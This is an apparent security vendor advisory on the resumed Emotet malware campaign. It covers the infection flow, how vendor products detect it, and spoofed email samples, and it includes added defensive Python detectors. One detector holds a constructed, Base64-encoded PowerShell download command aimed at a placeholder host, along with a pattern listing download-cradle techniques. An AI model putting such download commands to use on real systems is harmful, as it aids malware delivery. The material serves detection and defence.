Responding to the "Emotet" malware, which has resumed activity

Release date: August 7, 2020
Last updated: January 27, 2021

The malware known as Emotet has resumed its distribution activity since mid-July 2020. Many of you will already be aware of this, as multiple media outlets and institutions have published information about it.

[Reference] On the resumption of email distribution activity leading to Emotet malware infection (additional information)

In light of this situation, we summarize the detection status of our products and introduce some examples we have observed.

Emotet attack flow

We have also confirmed many attacks using Emotet. Compared with the previous attack campaign, which caused a lot of damage in Japan, the functionality of the malware has been improved, but the method itself does not appear to have changed significantly so far.

*We will update this page if any characteristic changes are confirmed in the latest attacks.

An attack leading to infection with the Emotet malware proceeds in the following steps.

  1. An email with an attached file is delivered (*1)
  2. The recipient opens the attached Office document, such as a Word file
  3. The recipient allows macros to be enabled
  4. The macro invokes WMI (*2), which starts PowerShell
  5. PowerShell downloads and executes the Emotet malware
  6. The host is infected with Emotet

*1 At this step, an email containing a URL link may be delivered instead of an attachment. In that case, clicking the URL in the email body downloads an Office document such as a Word file.
*2 WMI = Windows Management Instrumentation, the official Windows OS management tool
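Steps 4 and 5 of the flow leave a characteristic trace in process-creation telemetry: when a macro starts PowerShell through WMI, the parent of powershell.exe is the WMI provider host (WmiPrvSE.exe) rather than the Office process, and the command line is typically hidden and Base64-encoded. The following is an added example, not code from the original page or from any of the vendors listed; it scores constructed Sysmon-style events against those traits and decodes the -EncodedCommand payload for analysts (the event field names and the sample command line are assumptions made for the example).

```python
import base64
import re

# Constructed process-creation events in Sysmon Event ID 1 style. These are
# sample records written for this example, not telemetry from the original page.
SAMPLE_PAYLOAD = "Invoke-WebRequest http://example.invalid/constructed -OutFile $env:TEMP\\c.bin"
SAMPLE_EVENTS = [
    {   # steps 4-5 of the flow: WMI provider host spawns a hidden, encoded PowerShell
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -w hidden -enc "
        + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii"),
    },
    {   # ordinary administrative use: shell started from the desktop, running a script file
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -File C:\scripts\inventory.ps1",
    },
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
# Common ways a PowerShell one-liner fetches a file from the outside (step 5).
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE) or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event against the Emotet infection flow."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmdline = event.get("CommandLine", "")
    findings = []
    if image.endswith("powershell.exe") and parent.endswith("wmiprvse.exe"):
        # Win32_Process.Create from a macro makes WmiPrvSE.exe the parent,
        # hiding the Office process that actually launched the shell.
        findings.append("powershell.exe spawned by WMI provider host")
    if HIDDEN_WINDOW.search(cmdline):
        findings.append("hidden window requested")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command line")
        if DOWNLOAD_CRADLE.search(decoded):
            findings.append("download cradle in decoded command")
    if len(findings) >= 2:
        verdict = "alert"
    elif findings:
        verdict = "review"
    else:
        verdict = "ok"
    return {"verdict": verdict, "findings": findings, "decoded": decoded}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = analyze_event(ev)
        print(result["verdict"], result["findings"])
        if result["decoded"]:
            print("  decoded:", result["decoded"])
```

The parent-process check alone is only a "review" signal, since administrators do start PowerShell through WMI; it becomes an alert when combined with a hidden window, an encoded command or a download cradle in the decoded text.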

Detection status in our products

The following is based on Emotet samples we obtained and on cases confirmed in customer environments, and is described with reference to each step (1 to 6) of the Emotet attack flow above.

Please note that results may change as new attack techniques emerge.

(Manufacturer: product name, followed by detection status)

Broadcom: Symantec Endpoint Protection 14
  • Malicious Word files and malicious macros can be detected and quarantined by signature
  • Even if ② is bypassed, the behavior of PowerShell retrieving a file from an external host can be detected and blocked
CrowdStrike: Falcon
  • Malicious Word files launching PowerShell via WMI are detected and blocked (Prevention Policy > Suspicious Behavior: Enable)
    At that point the executed PowerShell command can also be displayed in its Base64-encoded form.
  • Even if the file is downloaded, it is analyzed by the NGAV when executed and can be blocked if judged malicious (Prevention Policy > Next-Gen Antivirus: Moderate)
FireEye: FireEye EX/ETP/NX
  EX/ETP:
  • Emails carrying attachments/URLs are detected and quarantined
  NX:
  • (URL email pattern) If a signature matches the Word file download traffic, the appliance attempts to prevent the connection from succeeding with a reset packet. Even if the download is not blocked, the appliance can detect the downloaded file's malicious macro
  • If a signature matches the malicious file download traffic generated by PowerShell, the appliance attempts to prevent the connection from succeeding with a reset packet. Even if the download is not blocked, the appliance can detect the downloaded malicious file
Menlo Security: Menlo Security Secure Office 365 / Secure G Suite (email isolation)
  • Because attachments contained in emails are opened in a separate cloud environment, users can view them safely in a rendered, harmless form. It is also possible to prohibit downloading of attachments and allow viewing only, or to prohibit downloading only when the cloud-side security function judges them malicious.
McAfee: VirusScan Enterprise / Endpoint Security / MVISION Endpoint
  • Word files can be blocked if a signature identifies them as malicious
  • The downloaded file can be blocked if a signature identifies it as malicious
Team T5: TeamT5 ThreatSonar (used by the Mpression Cyber Security Service™ Threat Hunting & Incident Response Service)
  • Emotet infection can be detected with YARA rules applied to endpoint memory (e.g. APT_Emotet_Memory_Codec)

About attack emails

From here we introduce some of the email samples we were able to observe. In the reply type, the attack email arrives as a reply to an email that the recipient actually sent. In other cases, many subject lines relate to "invoices", presumably reflecting the time of year.

Many of the attack emails we received passed SPF (Sender Policy Framework), one of the anti-spoofing measures. In addition, presumably so that the mail would be delivered without being held up, only the Display Name was spoofed; as a result, even when the spoofed domain had DKIM (DomainKeys Identified Mail) configured, DKIM did not fail but passed. (In some cases, mail purporting to come from domains that do not use DKIM carried a DKIM signature anyway, and in those cases DKIM failed.) This display name spoofing appears similar to that seen in the campaign at the end of 2019.
In general, technologies such as SPF/DKIM are considered effective countermeasures against spoofing, but since they can be evaded in this way, they should not be over-relied upon.
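The point above is that SPF and DKIM authenticate the domain that actually sent the mail, so they pass when the attacker uses their own infrastructure and only forges the Display Name. The following is an added example, not code from the original page: it parses the From header of constructed messages, flags a display name that carries an email address whose domain differs from the address in angle brackets (the "Pattern using email address as display name" shown later on this page), and reads the Authentication-Results header to show that SPF/DKIM nonetheless pass. All addresses, domains and header values are invented for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed messages for this example. Addresses, domains and the
# Authentication-Results header are invented; none come from the original page.
SPOOFED_DISPLAY_NAME = """\
From: "taro.yamada@partner.example" <notice@unrelated.example>
To: hanako@victim.example
Subject: Re: Invoice
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=unrelated.example;
 dkim=pass header.d=unrelated.example
Content-Type: text/plain; charset=utf-8

Please see the attached invoice.
"""

LEGITIMATE = """\
From: Taro Yamada <taro.yamada@partner.example>
To: hanako@victim.example
Subject: Re: Invoice
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=partner.example;
 dkim=pass header.d=partner.example
Content-Type: text/plain; charset=utf-8

Attached as discussed.
"""

# An email address appearing inside free text such as a display name.
ADDRESS_IN_TEXT = re.compile(r"[\w.+-]+@(?:[\w-]+\.)+[\w-]+")


def domain_of(address):
    """Lower-cased domain part of an address, or '' if there is none."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def auth_results(msg):
    """Collect spf/dkim/dmarc verdicts from Authentication-Results headers."""
    results = {}
    for header in msg.get_all("Authentication-Results", []):
        for mech, verdict in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header, re.IGNORECASE):
            results[mech.lower()] = verdict.lower()
    return results


def analyze_from(raw_message):
    """Compare the display name with the real address in <> and report findings."""
    msg = message_from_string(raw_message)
    display_name, address = parseaddr(msg.get("From", ""))
    findings = []
    embedded = ADDRESS_IN_TEXT.search(display_name)
    if embedded and domain_of(embedded.group(0)) != domain_of(address):
        findings.append(
            f"display name shows {embedded.group(0)} but the address in <> is {address}"
        )
    auth = auth_results(msg)
    if findings and auth.get("spf") == "pass" and auth.get("dkim") == "pass":
        # Both mechanisms vouch for the sending domain, not for the display name.
        findings.append("SPF and DKIM pass for the sending domain and do not flag this")
    return {
        "display_name": display_name,
        "address": address,
        "auth": auth,
        "findings": findings,
        "suspicious": bool(findings),
    }


if __name__ == "__main__":
    for sample in (SPOOFED_DISPLAY_NAME, LEGITIMATE):
        print(analyze_from(sample))
```

A gateway rule of this kind complements SPF/DKIM rather than replacing them: it looks at the one field the attacker controls freely, the display name, and treats a passing authentication result as no reason to clear the message.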

attachment pattern

URL pattern

Pattern using email address as display name

Examples observed since September 2020

Cases where the Japanese text is natural

In the case below, the sender is disguised using the same method as in "Pattern using email address as display name". In addition, the display name was crafted to match the subject and the recipient.

The body of the email itself also appears less unnatural than in the earlier emails.

In addition to the above, we also found cases posing as support satisfaction questionnaires for specific products that are widely used in Japan.

The unnaturalness of the Japanese is becoming increasingly difficult to discern.

Do not open suspicious files, and even if a file has been opened, do not enable macros.

A case where a malicious file is delivered in a password-protected ZIP

Some emails deliver the malicious file in a password-protected ZIP. Depending on how the password is written in the body and on the security email gateway in use, this attack may not be detected. Please consider addressing it in combination with monitoring at the endpoint.

Cases observed since January 2021

From mid-January, Emotet distribution activity has resumed. Below are some samples we have confirmed. We omit the details, but the attack process has changed from the above: the main change is that Emotet, previously distributed as an .exe file, is now distributed as a .dll file.

Emails that take advantage of the declaration of a state of emergency

With the declaration of a state of emergency, emails that appear to have actually been sent by companies have been misused. Nothing incongruous can be found in the email text itself, so it is important to check the sender's email address again. When checking, pay attention to the address in the angle brackets "< >", not the display name. The display name may impersonate someone you do business with.

Image password notification

Delivering malicious files using the password-protection function of ZIP files has been a method for a long time, but conveying the password as an image, as shown below, has been confirmed as a recent Emotet delivery method. This attack may not be detected by your security email gateway. Please consider addressing it in combination with monitoring at the endpoint.
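A gateway cannot inspect the contents of a password-protected archive, but it can still see that the archive is encrypted and whether the message supplies the password as text or, as in this case, not at all (with an image attached instead). The following is an added example, not code from the original page, covering both the password-in-text case described earlier on this page and the password-as-image case above: it builds constructed sample messages, reads the ZIP encryption flag from the archive's headers, and reports how the password appears to be conveyed. The archive, the body texts, the password-hint keywords and the attachment names are all invented for the example.

```python
import io
import re
import zipfile
from email.message import EmailMessage


def build_sample_zip(encrypted):
    """Constructed sample archive holding a placeholder document; not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.doc", b"constructed placeholder, not a real document")
    data = bytearray(buf.getvalue())
    if encrypted:
        # Set general-purpose flag bit 0 ("encrypted") in the local file header
        # (flags at offset 6) and in the central directory entry (offset 8);
        # this is how a password-protected ZIP marks its members.
        data[data.find(b"PK\x03\x04") + 6] |= 0x01
        data[data.find(b"PK\x01\x02") + 8] |= 0x01
    return bytes(data)


def encrypted_members(blob):
    """Names of archive members whose encryption flag is set; [] if not a ZIP."""
    try:
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            return [info.filename for info in zf.infolist() if info.flag_bits & 0x1]
    except zipfile.BadZipFile:
        return []


def build_sample_mail(zip_bytes, body, with_image):
    """Constructed email with a ZIP attachment, an optional image, and the given body."""
    msg = EmailMessage()
    msg["From"] = "sender@constructed.example"
    msg["To"] = "recipient@constructed.example"
    msg["Subject"] = "Invoice"
    msg.set_content(body)
    msg.add_attachment(zip_bytes, maintype="application", subtype="zip", filename="invoice.zip")
    if with_image:
        msg.add_attachment(b"\x89PNG\r\n\x1a\n(constructed)", maintype="image",
                           subtype="png", filename="password.png")
    return msg


# A password written in the body, e.g. "Password: 1234" or "パスワード：1234".
PASSWORD_IN_TEXT = re.compile(
    r"(?:password|passcode|pw|パスワード)\s*(?:[:：]|is)\s*\S+", re.IGNORECASE
)


def analyze_mail(msg):
    """Report encrypted ZIP attachments and how the password seems to be conveyed."""
    findings = []
    body_text = ""
    has_image = False
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if part.get_content_disposition() == "attachment":
            payload = part.get_payload(decode=True) or b""
            if ctype.startswith("image/"):
                has_image = True
            elif payload.startswith(b"PK"):
                for name in encrypted_members(payload):
                    findings.append(f"encrypted member {name} in {part.get_filename()}")
        elif ctype == "text/plain":
            body_text += part.get_content()
    if findings:
        if PASSWORD_IN_TEXT.search(body_text):
            findings.append("password for the archive is written in the message body")
        elif has_image:
            findings.append("no password in text but an image is attached: "
                            "password may be conveyed as an image")
        else:
            findings.append("no password found in text or image")
    return findings


if __name__ == "__main__":
    print(analyze_mail(build_sample_mail(build_sample_zip(True), "Invoice attached. Password: 1234", False)))
    print(analyze_mail(build_sample_mail(build_sample_zip(True), "Invoice attached. See the image.", True)))
    print(analyze_mail(build_sample_mail(build_sample_zip(False), "Invoice attached.", False)))
```

Either outcome is a reason to hold the message for endpoint-side inspection: an encrypted archive whose password is nowhere in the text, yet arrives with an image, is exactly the pattern described above, and a keyword match on the body is only as good as the list of password phrases it knows.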